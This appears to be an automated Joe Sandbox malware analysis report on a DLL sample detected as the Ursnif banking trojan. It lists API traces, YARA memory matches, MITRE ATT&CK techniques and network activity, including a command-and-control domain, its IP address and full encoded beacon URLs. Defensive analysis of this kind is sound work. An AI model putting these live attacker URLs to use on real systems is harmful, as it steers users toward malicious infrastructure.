Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A012B3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_04A012B3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A0F46C GetSystemTimeAsFileTime,HeapFree,

1_2_04A0F46C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_049FB96C RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

1_2_049FB96C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_049F5CA8 SleepEx,GetVersion,GetModuleHandleA,GetProcAddress,

1_2_049F5CA8

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information2	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Software Packing1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Access Token Manipulation1	DLL Side-Loading1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Process Injection712	Rootkit4	NTDS	System Information Discovery25	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Security Software Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion3	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection712	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mal.dll	9%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.regsvr32.exe.2b80000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
lopppooole.xyz	1%	Virustotal	Browse
edge.gycpi.b.yahoodns.net	0%	Virustotal	Browse
img.img-taboola.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://lopppooole.xyz/manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiw	0%	Avira URL Cloud	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
http://lopppooole.xyz/manifest/QNYwAwEGA6Nk/oqkcQpDHt62/AROwNcnS85Yj6H/Kiw419AbdChBoBC1YflBI/btAWmao42bhmIwaw/rj9hokXq7cOPoMP/C6Fociq1a8i5R_2FP7/qMKfDX8g_/2FYBsdaqsojE5zyNbglU/W9s5aDB_2BHGEIqE0sh/uWRUQeNVDF60PzY5NXM2Np/58y3_2Bk8eYWnbwr0ru/GleU.cnx	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	Avira URL Cloud	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
http://lopppooole.xyz/manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiwsAXb_2FQL/BI0B_2BEHYbzkri/CVbt6Ud3hbu6juyQ39/_2FdPSw_2/FAhy67XuasfNyAs2fp_2/FWN1bdwTDPIYYGwfcgE/MI3f3RUzobEk8E33KaQBi_/2BX59YotVm2s8/5lk6oUdX/LH2keW.cnx	0%	Avira URL Cloud	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	104.84.56.24	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	104.84.56.24	true	false		high
lg3.media.net	104.84.56.24	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
lopppooole.xyz	185.186.244.49	true	false	1%, Virustotal, Browse	unknown
edge.gycpi.b.yahoodns.net	87.248.118.23	true	false	0%, Virustotal, Browse	unknown
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
s.yimg.com	unknown	unknown	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
1.0.0.127.in-addr.arpa	unknown	unknown	true		unknown
8.8.8.8.in-addr.arpa	unknown	unknown	true		unknown
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lopppooole.xyz/manifest/QNYwAwEGA6Nk/oqkcQpDHt62/AROwNcnS85Yj6H/Kiw419AbdChBoBC1YflBI/btAWmao42bhmIwaw/rj9hokXq7cOPoMP/C6Fociq1a8i5R_2FP7/qMKfDX8g_/2FYBsdaqsojE5zyNbglU/W9s5aDB_2BHGEIqE0sh/uWRUQeNVDF60PzY5NXM2Np/58y3_2Bk8eYWnbwr0ru/GleU.cnx	false	Avira URL Cloud: safe	unknown
http://lopppooole.xyz/manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiwsAXb_2FQL/BI0B_2BEHYbzkri/CVbt6Ud3hbu6juyQ39/_2FdPSw_2/FAhy67XuasfNyAs2fp_2/FWN1bdwTDPIYYGwfcgE/MI3f3RUzobEk8E33KaQBi_/2BX59YotVm2s8/5lk6oUdX/LH2keW.cnx	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	~DF24569624759CC30D.TMP.3.dr	false		high
http://lopppooole.xyz/manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiw	{BA4D6CF6-5A92-11EB-90E4-ECF4BB862DED}.dat.3.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.4.dr	false		high
https://www.remixd.com/privacy_policy.html	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;Fotos	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
http://constitution.org/usdeclar.txtC:	regsvr32.exe, 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://beap.gemini.yahoo.com/action?bv=1.0.0&es=fh6wC_gGIS.10f2hn6DNm4WjTpq0zHdzzquo1zLbbfODSiK	auction[1].htm.4.dr	false		high
http://https://file://USER.ID%lu.exe/upd	regsvr32.exe, 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/j%c3%bcdisches-online-treffen-mit-hitler-und-porno-bildern-gest	de-ch[1].htm.4.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DF24569624759CC30D.TMP.3.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	false		high
https://www.msn.com/de-ch/news/other/streit-um-lohnerh%c3%b6hung-f%c3%bcr-den-z%c3%bcrcher-kantonsra	de-ch[1].htm.4.dr	false		high
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.4.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001F.00000002.562212430.000002BCAD2D1000.00000004.00000001.sdmp	false		high
http://www.reddit.com/	msapplication.xml4.3.dr	false		high
https://www.skype.com/	de-ch[1].htm.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/uhren-und-schmuck-im-wert-von-%c3%bcber-260-000-franken-geklaut	de-ch[1].htm.4.dr	false		high
https://s.yimg.com/lo/api/res/1.2/AlAilqKi7W35LtcnI7DHWQ--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1	auction[1].htm.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/drecksarbeit-gemacht-mann-stiftet-14-j%c3%a4hrigen-zu-raub%c3%b	de-ch[1].htm.4.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.4.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://client-s.gateway.messenger.live.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.brightcom.com/privacy-policy/	iab2Data[1].json.4.dr	false		high
https://contoso.com/Icon	powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	~DF24569624759CC30D.TMP.3.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.4.dr	false		high
https://bealion.com/politica-de-cookies	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/der-z%c3%bcrcher-kantonsrat-h%c3%a4lt-nichts-davon-mehr-geld-f%	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.4.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.4.dr	false		high
https://twitter.com/i/notifications;Ich	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.4.dr	false		high
https://www.gadsme.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp	false		high
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.4.dr	false		high
http://constitution.org/usdeclar.txt	regsvr32.exe, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://s.yimg.com/lo/api/res/1.2/.UiDyEjfgZbPhaApSjF6RQ--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1	auction[1].htm.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.4.dr	false		high
http://www.youtube.com/	msapplication.xml7.3.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.4.dr	false		high
https://docs.prebid.org/privacy.html	iab2Data[1].json.4.dr	false		high
https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=lwPv9W0GIS_qyQvCpzJTy3EGufaBHjdqJd8SOiFJsdj7	auction[1].htm.4.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://s.yimg.com/lo/api/res/1.2/9FkxQzh8n2OLcwPo6n5irg--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1	auction[1].htm.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.4.dr	false		high
https://www.skype.com/de/download-skype	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.4.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://channelpilot.co.uk/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.4.dr	false		high
https://contoso.com/License	powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://srtb.msn.com:443/notify/viewedg?rid=f16406a7b26f4c8ba0192b5d2df01324&r=infopane&i=3&	auction[1].htm.4.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
http://www.amazon.com/	msapplication.xml.3.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://www.twitter.com/	msapplication.xml5.3.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.admo.tv/en/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/damit-im-homeoffice-nicht-wieder-der-r%c3%bccken-schmerzt/ar-BB	de-ch[1].htm.4.dr	false		high
https://policies.oath.com/us/en/oath/privacy/index.html	auction[1].htm.4.dr	false		high
https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath	iab2Data[1].json.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://outlook.com/	de-ch[1].htm.4.dr	false		high
https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DF24569624759CC30D.TMP.3.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.4.dr	false		high
https://contoso.com/	powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/das-ansteckungsrisiko-beim-coronavirus-sei-zu-gross-die-zhaw-ve	de-ch[1].htm.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"	auction[1].htm.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	~DF24569624759CC30D.TMP.3.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.4.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.186.244.49	unknown	Netherlands	35415	WEBZILLANL	false
87.248.118.23	unknown	United Kingdom	203220	YAHOO-DEBDE	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	341461
Start date:	19.01.2021
Start time:	12:10:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	mal.dll
Cookbook file name:	default.jbs
